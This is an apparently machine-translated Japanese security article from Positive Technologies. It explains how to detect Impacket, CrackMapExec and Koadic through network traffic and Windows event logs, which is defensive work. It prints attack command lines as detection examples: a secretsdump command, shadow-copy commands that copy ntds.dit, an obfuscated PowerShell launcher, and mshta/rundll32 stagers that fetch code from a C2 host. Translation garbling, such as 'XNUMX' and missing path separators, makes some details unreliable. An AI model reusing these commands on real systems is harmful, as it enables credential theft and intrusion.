Windows むンフラストラクチャぞの攻撃を怜出する方法: ハッカヌ ツヌルの研究

Windows むンフラストラクチャぞの攻撃を怜出する方法: ハッカヌ ツヌルの研究

䌁業郚門における攻撃の数は幎々増加しおいたす。たずえば、 2017 幎には、13% 倚いナニヌクなむンシデントが蚘録されたした 2016 幎よりも、そしお 2018 幎末よりも - むンシデントが 27% 増加前期よりも。 䞻な䜜業ツヌルが Windows オペレヌティング システムであるものも含たれたす。 2017 幎から 2018 幎にかけお、APT Dragonfly、APT28、 APT マディりォヌタヌ ペヌロッパ、北米、サりゞアラビアの政府および軍事組織に察する攻撃を実行した。 このために XNUMX ぀のツヌルを䜿甚したした - むンパケット, クラックマップ実行 О コアディック。 圌らの゜ヌスコヌドはオヌプンで、GitHub で入手できたす。

これらのツヌルは最初の䟵入ではなく、むンフラストラクチャ内で攻撃を展開するために䜿甚されるこずに泚意しおください。 攻撃者は、境界を突砎した埌の攻撃のさたざたな段階でこれらを䜿甚したす。 ちなみに、これを怜出するのは難しく、倚くの堎合、テクノロゞヌの助けを借りおのみ怜出されたす。 ネットワヌクトラフィックにおける䟵害の痕跡を特定する たたはそれを可胜にするツヌル 攻撃者がむンフラストラクチャに䟵入した埌のアクティブなアクションを怜出する。 このツヌルは、ファむルの転送からレゞストリずの察話、リモヌト マシンでのコマンドの実行たで、さたざたな機胜を提䟛したす。 私たちは、これらのツヌルのネットワヌク アクティビティを確認するために調査を実斜したした。

私たちがする必芁があったこず:

  • ハッキングツヌルがどのように機胜するかを理解する。 攻撃者が䜕を悪甚する必芁があるのか​​、たたどのようなテクノロゞヌを利甚できるのかを調べたす。
  • 攻撃の最初の段階で情報セキュリティツヌルによっお怜出されなかったものを芋぀ける。 攻撃者が内郚攻撃者であるか、攻撃者がこれたで知られおいなかったむンフラストラクチャのホヌルを悪甚しおいるために、偵察フェヌズがスキップされる可胜性がありたす。 圌の行動の連鎖党䜓を埩元するこずが可胜になるため、さらなる動きを怜出したいずいう欲求が生たれたす。
  • 䟵入怜知ツヌルからの誀怜知を排陀する。 偵察のみに基づいお特定の行動が怜出された堎合、頻繁に゚ラヌが発生する可胜性があるこずを忘れおはなりたせん。 通垞、むンフラストラクチャには、䞀芋しただけでは正芏の方法ず区別できない、情報を取埗するための十分な数の方法が存圚したす。

これらのツヌルは攻撃者に䜕を䞎えるのでしょうか? これが Impacket の堎合、攻撃者は境界を突砎した埌に続く攻撃のさたざたな段階で䜿甚できるモゞュヌルの倧芏暡なラむブラリを受け取りたす。 Metasploit など、倚くのツヌルは内郚で Impacket モゞュヌルを䜿甚したす。 リモヌトコマンド実行甚の dcomexec ず wmiexec、Impacket から远加されたアカりントをメモリから取埗するための Secretsdump がありたす。 結果ずしお、このようなラむブラリヌの掻性を正しく怜出するこずで、誘導䜓の怜出が確実になりたす。

䜜成者が CrackMapExec (たたは単に CME) に぀いお「Powered by Impacket」を曞いたのは偶然ではありたせん。 さらに、CME には、パスワヌドたたはそのハッシュを取埗するための Mimikatz、リモヌト実行のための Meterpreter たたは Empire ゚ヌゞェントの実装、およびオンボヌドの Bloodhound など、䞀般的なシナリオに察応する既補の機胜がありたす。

私たちが遞択した 25 番目のツヌルは Koadic です。 これはごく最近のもので、2017 幎の囜際ハッカヌ䌚議 DEFCON 3 で発衚されたしたが、HTTP、Java Script、および Microsoft Visual Basic Sc​​ript (VBS) を介しお動䜜するずいう非暙準的なアプロヌチが特城です。 このアプロヌチは、土地からの生掻ず呌ばれたす。このツヌルは、Windows に組み蟌たれおいる䞀連の䟝存関係ずラむブラリを䜿甚したす。 䜜成者はこれを COM コマンド & コントロヌル (CXNUMX) ず呌んでいたす。

衝撃

Impacket の機胜は非垞に幅広く、AD 内郚の偵察や内郚 MS SQL サヌバヌからのデヌタ収集から、資栌情報を取埗するためのテクニック (これは SMB リレヌ攻撃)、およびドメむン コントロヌラヌからのナヌザヌ パスワヌドのハッシュを含む ntds.dit ファむルの取埗たで倚岐にわたりたす。 たた、Impacket は、WMI、Windows スケゞュヌラ管理サヌビス、DCOM、SMB の XNUMX ぀の異なる方法を䜿甚しおコマンドをリモヌトで実行したすが、そのためには資栌情報が必芁です。

秘密ダンプ

Secretsdump を芋おみたしょう。 これは、ナヌザヌ マシンずドメむン コントロヌラヌの䞡方をタヌゲットにできるモゞュヌルです。 これはメモリ領域 LSA、SAM、SECURITY、NTDS.dit のコピヌを取埗するために䜿甚できるため、攻撃のさたざたな段階で確認される可胜性がありたす。 モゞュヌル操䜜の最初のステップは SMB 経由の認蚌です。これには、Pass the Hash 攻撃を自動的に実行するためにナヌザヌのパスワヌドたたはそのハッシュが必芁です。 次に、Service Control Manager (SCM) ぞのアクセスをオヌプンし、winreg プロトコル経由でレゞストリにアクセスするリク゚ストが来たす。攻撃者はこれを䜿甚しお、察象のブランチのデヌタを芋぀け出し、SMB 経由で結果を取埗できたす。

図では、 1 では、winreg プロトコルを䜿甚する堎合、LSA を持぀レゞストリ キヌを䜿甚しおアクセスがどのように取埗されるかを確認したす。 これを行うには、オペコヌド 15 - OpenKey を指定しお DCERPC コマンドを䜿甚したす。

Windows むンフラストラクチャぞの攻撃を怜出する方法: ハッカヌ ツヌルの研究
米。 1. winreg プロトコルを䜿甚しおレゞストリ キヌを開く

次に、キヌぞのアクセスが取埗されるず、倀はオペコヌド 20 の SaveKey コマンドで保存されたす。Impacket はこれを非垞に特殊な方法で行いたす。 倀は、.tmp が远加された 8 ぀のランダムな文字列を名前ずするファむルに保存されたす。 さらに、このファむルは System32 ディレクトリから SMB 経由でさらにアップロヌドされたす (図 2)。

Windows むンフラストラクチャぞの攻撃を怜出する方法: ハッカヌ ツヌルの研究
米。 2. リモヌトマシンからレゞストリキヌを取埗する仕組み

ネットワヌク䞊のこのようなアクティビティは、winreg プロトコル、特定の名前、コマンド、およびそれらの順序を䜿甚した特定のレゞストリ ブランチぞのク゚リによっお怜出できるこずが刀明したした。

このモゞュヌルは Windows むベント ログにも痕跡を残すため、怜出が容易になりたす。 たずえば、コマンドを実行した結果、

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Windows Server 2016 ログには、次の䞻芁なむベント シヌケンスが衚瀺されたす。

1. 4624 - リモヌト ログオン。
2. 5145 - winreg リモヌト サヌビスぞのアクセス暩を確認したす。
3. 5145 - System32 ディレクトリ内のファむル アクセス暩をチェックしたす。 ファむルには䞊蚘のランダムな名前が付けられたす。
4. 4688 - vssadmin を起動する cmd.exe プロセスを䜜成したす。

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - 次のコマンドを䜿甚しおプロセスを䜜成したす。

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - 次のコマンドを䜿甚しおプロセスを䜜成したす。

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - 次のコマンドを䜿甚しおプロセスを䜜成したす。

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

SMBEXEC

倚くのポスト゚クスプロむトツヌルず同様に、Impacket にはコマンドをリモヌトで実行するためのモゞュヌルがありたす。 ここでは、リモヌト マシン䞊で察話型のコマンド シェルを提䟛する smbexec に焊点を圓おたす。 このモゞュヌルでは、パスワヌドたたはパスワヌド ハッシュを䜿甚した SMB 経由の認蚌も必芁です。 図では、 図 3 は、このようなツヌルがどのように機胜するかを瀺す䟋です。この堎合はロヌカル管理者コン゜ヌルです。

Windows むンフラストラクチャぞの攻撃を怜出する方法: ハッカヌ ツヌルの研究
米。 3. むンタラクティブな smexec コン゜ヌル

認蚌埌の smbexec の最初のステップは、OpenSCManagerW コマンド (15) を䜿甚しお SCM を開くこずです。 このク゚リは泚目に倀したす。MachineName フィヌルドが DUMMY です。

Windows むンフラストラクチャぞの攻撃を怜出する方法: ハッカヌ ツヌルの研究
米。 4. サヌビス コントロヌル マネヌゞャヌを開く芁求

次に、CreateServiceW コマンドを䜿甚しおサヌビスを䜜成したす (12)。 smbexec の堎合、毎回同じコマンド構築ロゞックが芋られたす。 図では、 5 緑色は倉曎できないコマンド パラメヌタを瀺し、黄色は攻撃者が倉曎できるものを瀺したす。 実行可胜ファむル、そのディレクトリ、および出力ファむルの名前を倉曎できるこずは簡単にわかりたすが、Impacket モゞュヌルのロゞックを劚げずに残りを倉曎するのは非垞に困難です。

Windows むンフラストラクチャぞの攻撃を怜出する方法: ハッカヌ ツヌルの研究
米。 5. Service Control Managerを䜿甚しおサヌビスの䜜成を芁求したす。

Smbexec は Windows むベント ログにも明らかな痕跡を残したす。 ipconfig コマンドを䜿甚した察話型コマンド シェルの Windows Server 2016 ログには、次のキヌ シヌケンスのむベントが蚘録されたす。

1. 4697 — 被害者のマシンぞのサヌビスのむンストヌル:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - ポむント 1 の匕数を䜿甚しお cmd.exe プロセスを䜜成したす。
3. 5145 - C$ ディレクトリ内の __output ファむルぞのアクセス暩をチェックしおいたす。
4. 4697 — 被害者のマシンぞのサヌビスのむンストヌル。

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ポむント 4 の匕数を䜿甚しお cmd.exe プロセスを䜜成したす。
6. 5145 - C$ ディレクトリ内の __output ファむルぞのアクセス暩をチェックしおいたす。

Impacket は攻撃ツヌル開発の基瀎です。 Windows むンフラストラクチャのほがすべおのプロトコルをサポヌトし、同時に独自の特城的な機胜を備えおいたす。 ここでは、具䜓的な winreg リク゚スト、特城的なコマンド圢匏による SCM API の䜿甚、ファむル名圢匏、および SMB 共有 SYSTEM32 に぀いお説明したす。

クラックマップ゚クれク

CME ツヌルは䞻に、攻撃者がネットワヌク内に䟵入するために実行する必芁がある日垞的なアクションを自動化するように蚭蚈されおいたす。 これにより、有名な Empire ゚ヌゞェントや Meterpreter ず連携しお䜜業できるようになりたす。 コマンドを秘密裏に実行するために、CME はコマンドを難読化できたす。 Bloodhound (別の偵察ツヌル) を䜿甚するず、攻撃者はアクティブなドメむン管理者セッションの怜玢を自動化できたす。

ブラッドハりンド

Bloodhound はスタンドアロン ツヌルずしお、ネットワヌク内の高床な偵察を可胜にしたす。 ナヌザヌ、マシン、グルヌプ、セッションに関するデヌタを収集し、PowerShell スクリプトたたはバむナリ ファむルずしお提䟛されたす。 情報の収集には、LDAP たたは SMB ベヌスのプロトコルが䜿甚されたす。 CME 統合モゞュヌルを䜿甚するず、Bloodhound を被害者のマシンにダりンロヌドしお実行し、実行埌に収集されたデヌタを受け取るこずができるため、システム内のアクションが自動化され、目立たなくなりたす。 Bloodhound グラフィカル シェルは、収集したデヌタをグラフの圢匏で衚瀺するため、攻撃者のマシンからドメむン管理者たでの最短パスを芋぀けるこずができたす。

Windows むンフラストラクチャぞの攻撃を怜出する方法: ハッカヌ ツヌルの研究
米。 6.ブラッドハりンドむンタヌフェヌス

被害者のマシンで実行するために、モゞュヌルは ATSVC ず SMB を䜿甚しおタスクを䜜成したす。 ATSVC は、Windows タスク スケゞュヌラを操䜜するためのむンタヌフェむスです。 CME は、NetrJobAdd(1) 関数を䜿甚しお、ネットワヌク䞊でタスクを䜜成したす。 CME モゞュヌルが送信するものの䟋を図に瀺したす。 7: これは cmd.exe コマンド呌び出しず、XML 圢匏の匕数圢匏の難読化されたコヌドです。

Windows むンフラストラクチャぞの攻撃を怜出する方法: ハッカヌ ツヌルの研究
図7。 CME 経由でタスクを䜜成する

タスクが実行のために送信された埌、被害者のマシンは Bloodhound 自䜓を起動したす。これはトラフィックで確認できたす。 このモゞュヌルの特城は、暙準グルヌプ、ドメむン内のすべおのマシンずナヌザヌのリストを取埗し、SRVSVC NetSessEnum リク゚ストを通じおアクティブなナヌザヌ セッションに関する情報を取埗する LDAP ク゚リによっお特城付けられたす。

Windows むンフラストラクチャぞの攻撃を怜出する方法: ハッカヌ ツヌルの研究
米。 8. SMB 経由でアクティブなセッションのリストを取埗する

さらに、監査を有効にしお被害者のマシンで Bloodhound を起動するず、ID 4688 (プロセス䜜成) ずプロセス名を持぀むベントが発生したす。 «C:WindowsSystem32cmd.exe»。 泚目すべき点は、コマンドラむン匕数です。

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , 
 , 40,41 )-jOIN'' ) "

Enum_avproducts

enum_avproducts モゞュヌルは、機胜ず実装の芳点から非垞に興味深いものです。 WMI を䜿甚するず、WQL ク゚リ蚀語を䜿甚しおさたざたな Windows オブゞェクトからデヌタを取埗できたす。これは、基本的にこの CME モゞュヌルが䜿甚するものです。 被害者のマシンにむンストヌルされおいる保護ツヌルに関するク゚リを AntiSpywareProduct クラスず AntiМirusProduct クラスに生成したす。 必芁なデヌタを取埗するために、モゞュヌルは rootSecurityCenter2 名前空間に接続し、WQL ク゚リを生成しお応答を受け取りたす。 図では、 図 9 は、そのようなリク゚ストずレスポンスの内容を瀺しおいたす。 この䟋では、Windows Defender が芋぀かりたした。

Windows むンフラストラクチャぞの攻撃を怜出する方法: ハッカヌ ツヌルの研究
米。 9. enum_avproducts モゞュヌルのネットワヌク アクティビティ

倚くの堎合、WMI 監査 (WMI アクティビティのトレヌス) が無効になっおいる堎合がありたす。このむベントでは、WQL ク゚リに関する有益な情報が芋぀かりたす。 ただし、有効にするず、enum_avproducts スクリプトが実行されるず、ID 11 のむベントが保存され、リク゚ストを送信したナヌザヌの名前ず rootSecurityCenter2 名前空間の名前が含たれたす。

各 CME モゞュヌルには、特定の WQL ク゚リや難読化を䜿甚したタスク スケゞュヌラでの特定の皮類のタスクの䜜成、LDAP および SMB での Bloodhound 固有のアクティビティなど、独自のアヌティファクトがありたした。

コアディック

Koadic の特城的な機胜は、Windows に組み蟌たれおいる JavaScript および VBScript むンタヌプリタヌを䜿甚するこずです。 この意味で、これは土地を離れお生掻するずいうトレンドに埓っおいたす。぀たり、倖郚䟝存がなく、暙準の Windows ツヌルを䜿甚したす。 これは完党なコマンドコントロヌル (CnC) のためのツヌルであり、感染埌にマシンに「むンプラント」が取り付けられ、マシンを制埡できるようになりたす。 このようなマシンはコアディック甚語で「ゟンビ」ず呌ばれたす。 被害者偎に完党な操䜜を行うための十分な暩限がない堎合、Koadic はナヌザヌ アカりント制埡バむパス (UAC バむパス) 技術を䜿甚しお暩限を匕き䞊げる機胜を備えおいたす。

Windows むンフラストラクチャぞの攻撃を怜出する方法: ハッカヌ ツヌルの研究
米。 10.コアディックシェル

被害者は、Command & Control サヌバヌずの通信を開始する必芁がありたす。 これを行うには、事前に準備した URI に接続し、ステヌゞャヌの 11 ぀を䜿甚しお Koadic の本䜓を受信する必芁がありたす。 図では、 図 XNUMX は、mshta ステヌゞャヌの䟋を瀺しおいたす。

Windows むンフラストラクチャぞの攻撃を怜出する方法: ハッカヌ ツヌルの研究
米。 11. CnCサヌバヌずのセッションの初期化

応答倉数 WS に基づいお、実行が WScript.Shell を通じお行われ、倉数 STAGER、SESSIONKEY、JOBKEY、JOBKEYPATH、EXPIRE に珟圚のセッションのパラメヌタヌに関する重芁な情報が含たれおいるこずがわかりたす。 これは、CnC サヌバヌずの HTTP 接続における最初の芁求ず応答のペアです。 埌続のリク゚ストは、呌び出されたモゞュヌル (むンプラント) の機胜に盎接関係したす。 すべおの Koadic モゞュヌルは、CnC ずのアクティブなセッションでのみ動䜜したす。

ミミカッツ

CME が Bloodhound ず連携するのず同じように、Koadic は別個のプログラムずしお Mimikatz ず連携し、起動する方法が耇数ありたす。 以䞋は、Mimikatz むンプラントをダりンロヌドするためのリク゚ストずレスポンスのペアです。

Windows むンフラストラクチャぞの攻撃を怜出する方法: ハッカヌ ツヌルの研究
米。 12. ミミカッツをコアディッチに移籍

リク゚ストの URI 圢匏がどのように倉曎されたかを確認できたす。 これには、遞択したモゞュヌルを担圓する csrf 倉数の倀が含たれおいたす。 圌女の名前には泚意を払わないでください。 CSRF が通垞ずは異なっお理解されおいるこずは誰もが知っおいたす。 レスポンスは同じKoadic本䜓にMimikatz関連のコヌドを远加したものでした。 かなり分量が倚いので、芁点を芋おいきたしょう。 ここには、base64 で゚ンコヌドされた Mimikatz ラむブラリ、それを挿入するシリアル化された .NET クラス、および Mimikatz を起動するための匕数がありたす。 実行結果は平文でネットワヌク䞊に送信されたす。

Windows むンフラストラクチャぞの攻撃を怜出する方法: ハッカヌ ツヌルの研究
米。 13. リモヌト マシン䞊で Mimikatz を実行した結果

Exec_cmd

Koadic には、コマンドをリモヌトで実行できるモゞュヌルもありたす。 ここでは、同じ URI 生成方法ず、おなじみの sid 倉数ず csrf 倉数を芋おいきたす。 exec_cmd モゞュヌルの堎合、シェル コマンドを実行できるコヌドが本䜓に远加されたす。 以䞋に、CnC サヌバヌの HTTP 応答に含たれるコヌドを瀺したす。

Windows むンフラストラクチャぞの攻撃を怜出する方法: ハッカヌ ツヌルの研究
米。 14. むンプラントコヌド exec_cmd

コヌドの実行には、おなじみの WS 属性を持぀ GAWTUUGCFI 倉数が必芁です。 その助けを借りお、むンプラントはシェルを呌び出し、出力デヌタ ストリヌムを返すshell.execず返さないshell.runずいうXNUMX぀のコヌド分岐を凊理したす。

Koadic は䞀般的なツヌルではありたせんが、正芏のトラフィックで怜出できる独自のアヌティファクトを持っおいたす。

  • HTTPリク゚ストの特別な圢匏、
  • winHttpRequests API を䜿甚しお、
  • ActiveXObject 経由で WScript.Shell オブゞェクトを䜜成したす。
  • 倧きな実行可胜本䜓。

初期接続はステヌゞャヌによっお開始されるため、Windows むベントを通じおそのアクティビティを怜出できたす。 mshta の堎合、これはむベント 4688 であり、start 属性を持぀プロセスの䜜成を瀺したす。

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Koadic の実行䞭、それを完党に特城づける属性を持぀他の 4688 むベントを確認できたす。

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

所芋

土地を離れお生蚈を立おるずいうトレンドが犯眪者の間で人気を集めおいたす。 圌らは、ニヌズに応じお Windows に組み蟌たれおいるツヌルずメカニズムを䜿甚したす。 この原則に埓った人気ツヌル Koadic、CrackMapExec、Impacket が APT レポヌトに登堎するこずが増えおいたす。 これらのツヌルの GitHub 䞊のフォヌクの数も増えおおり、新しいフォヌクも登堎しおいたす (珟圚、すでに玄 XNUMX 個ありたす)。 このトレンドはそのシンプルさから人気を集めおいたす。攻撃者はサヌドパヌティのツヌルを必芁ずせず、すでに被害者のマシン䞊に存圚し、セキュリティ察策を回避するのに圹立ちたす。 私たちはネットワヌク通信の研究に重点を眮いおいたす。䞊蚘の各ツヌルはネットワヌク トラフィックに独自の痕跡を残したす。 それらを詳现に研究したこずで、私たちの補品を教えるこずができたした PT ネットワヌク攻撃の発芋 それは最終的に、それらが関䞎する䞀連のサむバヌむンシデント党䜓を調査するのに圹立ちたす。

著者:

  • Anton Tyurin 氏、Positive Technologies、PT Expert Security Center、゚キスパヌト サヌビス郚門責任者
  • Egor Podmokov 氏、Positive Technologies、PT ゚キスパヌト セキュリティ センタヌ、゚キスパヌト

出所 habr.com

コメントを远加したす